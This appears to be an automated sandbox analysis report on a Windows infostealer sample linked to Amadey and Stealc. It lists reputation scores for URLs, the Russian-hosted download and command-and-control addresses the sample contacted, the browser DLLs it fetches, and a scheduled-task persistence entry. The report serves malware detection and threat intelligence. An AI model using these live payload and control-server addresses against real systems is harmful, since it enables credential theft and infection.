                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpM0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        http://77.91.77.81/cost/go.exe100%Avira URL Cloudmalware
                        http://85.28.47.4/Z100%Avira URL Cloudmalware
                        http://85.28.47.4/100%Avira URL Cloudmalware
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        http://85.28.47.4/18%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.phpM22%VirustotalBrowse
                        http://77.91.77.81/cost/go.exe27%VirustotalBrowse
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe27%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.phpB6100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%Avira URL Cloudsafe
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%VirustotalBrowse
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%Avira URL Cloudsafe
                        http://77.91.77.82/Hun4Ko/index.php100%Avira URL Cloudphishing
                        http://85.28.47.4/920475a59bac849d.php%100%Avira URL Cloudmalware
                        http://85.28.47.4/EM32100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/softokn3.dll100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.php5100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phpXo0%Avira URL Cloudsafe
                        http://85.28.47.4/920475a59bac849d.php%6%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/mozglue.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/softokn3.dll6%VirustotalBrowse
                        http://77.91.77.82/Hun4Ko/index.php24%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.php511%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/nss3.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/mozglue.dlle100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php/Hn100%Avira URL Cloudphishing
                        http://85.28.47.4/69934896f997d5bb/mozglue.dll7%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/mine/amadka.exe-Disposition:100%Avira URL Cloudphishing
                        http://85.28.47.4/69934896f997d5bb/nss3.dll%U100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/nss3.dll9%VirustotalBrowse
                        https://cdn.epnacl0%Avira URL Cloudsafe
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe00100%Avira URL Cloudphishing
                        http://77.91.77.82/0%Avira URL Cloudsafe
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe-Disposition:25%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe0025%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll100%Avira URL Cloudmalware
                        http://77.91.77.82/23%VirustotalBrowse
                        https://mozilla.org0/0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        http://85.28.47.4/920475a59bac849d.php100%Avira URL Cloudmalware
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll7%VirustotalBrowse
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll6%VirustotalBrowse
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        http://77.91.77.81/stealc/random.exe50673b5d7%100%Avira URL Cloudphishing
                        http://77.91.77.81/stealc/random.exe100%Avira URL Cloudmalware
                        http://85.28.47.4/920475a59bac849d.php23%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/cost/go.exe00100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.php#100%Avira URL Cloudphishing
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dllP100%Avira URL Cloudmalware
                        http://77.91.77.81/stealc/random.exe27%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.php_100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dll24%VirustotalBrowse
                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%Avira URL Cloudsafe
                        https://cdn.ep0%Avira URL Cloudsafe
                        http://85.28.47.4100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.phps0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll_INF100%Avira URL Cloudmalware
                        http://85.28.47.4/.100%Avira URL Cloudmalware
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%Avira URL Cloudsafe
                        http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b30%Avira URL Cloudsafe
                        http://85.28.47.4/845-40f1-ac21-573d1d5ce43f100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/softokn3.dllY100%Avira URL Cloudmalware
                        http://85.28.47.4/920475a59bac849d.phpz100%Avira URL Cloudmalware
                        http://77.91.77.82/Hun4Ko/index.php%H0%Avira URL Cloudsafe
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
                        http://77.91.77.81/cost/go.exeAppData100%Avira URL Cloudphishing
                        http://77.91.77.82/Hun4Ko/index.phpu0%Avira URL Cloudsafe
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://77.91.77.81/mine/amadka.exetrue
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phptrue
                        • 24%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.4/69934896f997d5bb/softokn3.dlltrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/mozglue.dlltrue
                        • 7%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/nss3.dlltrue
                        • 9%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dlltrue
                        • 7%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/freebl3.dlltrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.phptrue
                        • 23%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dlltrue
                        • 24%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dlltrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabHIEHDAFH.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=HIEHDAFH.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exefile.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmptrue
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpMexplorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 22%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/Za62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmptrue
                        • 18%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.phpB6a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.crfile.exe, random[1].exe.10.dr, a62ee169b8.exe.10.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.php%a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/EM32a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.php5file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 11%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpXoexplorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/mozglue.dllefile.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php/Hnexplorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://www.sqlite.org/copyright.html.file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309899894.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exe-Disposition:file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmptrue
                        • 25%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.4/69934896f997d5bb/nss3.dll%Ufile.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://cdn.epnaclfile.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exe00file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmptrue
                        • 25%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.82/explorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmptrue
                        • 23%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.mozilla.com/en-US/blocklist/file.exe, file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoHIEHDAFH.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiIJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/stealc/random.exe50673b5d7%explorti.exe, 0000000A.00000002.4563238492.00000000013A2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.81/stealc/random.exeexplorti.exe, 0000000A.00000002.4563238492.00000000013A2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://77.91.77.81/cost/go.exe00file.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php#explorti.exe, 0000000A.00000002.4563238492.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HIEHDAFH.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dllPfile.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://upx.sf.netAmcache.hve.6.drfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.php_a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.ecosia.org/newtab/file.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHJKKFIJKFCAKJJJKJKFIEBFIDG.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.epfile.exe, 00000000.00000002.2271135677.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4file.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BCE000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://ac.ecosia.org/autocomplete?q=HIEHDAFH.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpsexplorti.exe, 0000000A.00000002.4563238492.0000000001372000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll_INFfile.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/.a62ee169b8.exe, 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtHJKKFIJKFCAKJJJKJKFIEBFIDG.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://pki-ocsp.symauth.com0file.exe, random[1].exe.10.dr, a62ee169b8.exe.10.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/845-40f1-ac21-573d1d5ce43fa62ee169b8.exe, 0000000C.00000002.2396795251.0000000001C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/softokn3.dllYfile.exe, 00000000.00000002.2271135677.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.phpzfile.exe, 00000000.00000002.2271135677.00000000008AE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://support.mozilla.orgHJKKFIJKFCAKJJJKJKFIEBFIDG.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.82/Hun4Ko/index.php%Hexplorti.exe, 0000000A.00000002.4563238492.00000000013B1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HIEHDAFH.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000002.2271135677.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp, IJKFHDBKFCAAECBFIDHJ.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exeAppDatafile.exe, 00000000.00000002.2271711490.0000000001038000.00000040.00000001.01000000.00000003.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        http://77.91.77.82/Hun4Ko/index.phpuexplorti.exe, 0000000A.00000002.4563238492.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        77.91.77.81
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                        85.28.47.4
                        unknownRussian Federation
                        31643GES-ASRUtrue
                        77.91.77.82
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1466647
                        Start date and time:2024-07-03 08:37:20 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 12m 20s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@20/30@0/3
                        EGA Information:
                        • Successful, ratio: 40%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target HCGCBFHCFC.exe, PID 3916 because it is empty
                        • Execution Graph export aborted for target a62ee169b8.exe, PID 7292 because it is empty
                        • Execution Graph export aborted for target explorti.exe, PID 6412 because there are no executed function
                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        02:38:32API Interceptor11248404x Sleep call for process: explorti.exe modified
                        08:38:30Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        77.91.77.81file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 77.91.77.81/stealc/random.exe
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        8vZMEr8sm9.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/stealc/random.exe
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/mine/amadka.exe
                        85.28.47.4file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        Rnteb46TuM.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1jPL5zru3u.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        Zachv5lCuu.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                        • 85.28.47.4/920475a59bac849d.php
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        NBhsazR1jn.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81
                        QFDXInkpM8.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        https://drive.google.com/file/d/136ovnD62cwekGHQcz2rdHGNitd3tUNck/view?usp=sharing_eip_m&ts=6682d44dGet hashmaliciousUnknownBrowse
                        • 77.91.77.5
                        https://drive.google.com/file/d/1D-RSHnHV853uproVdm_FqLilvp6WEgCv/view?ts=6682d412Get hashmaliciousUnknownBrowse
                        • 77.91.77.5
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.82
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                        • 77.91.77.81
                        GES-ASRUfile.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        Wf9qnVcbi8.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 85.28.47.4
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                        • 85.28.47.7
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 85.28.47.4
